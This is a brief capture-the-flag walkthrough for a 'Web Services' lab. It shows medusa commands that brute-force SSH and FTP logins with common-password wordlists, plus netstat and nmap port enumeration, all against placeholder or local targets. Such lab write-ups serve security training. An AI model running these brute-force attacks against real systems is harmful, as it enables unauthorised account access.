Web Services

Getting the flag:

Step 1 - Launch the attack with this password wordlist:

medusa -h <SERVER_IP> -n <SERVER_PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Step 2 - Login to the server with the password we just found:

Step 3 - Expand the Attack Surface:

Execute the netstat command to listen open ports and listen service:
- netstat -tulpn | grep LISTEN
- And we found the port 21 open
Confirm the port 21 is open with nmap:
- nmap 127.0.0.1

Step 4 - Targeting the FTP Server:

Brute-force the authentication mechanism:

medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5

Step 5 - Retrieve the flag:

Last updated 9 months ago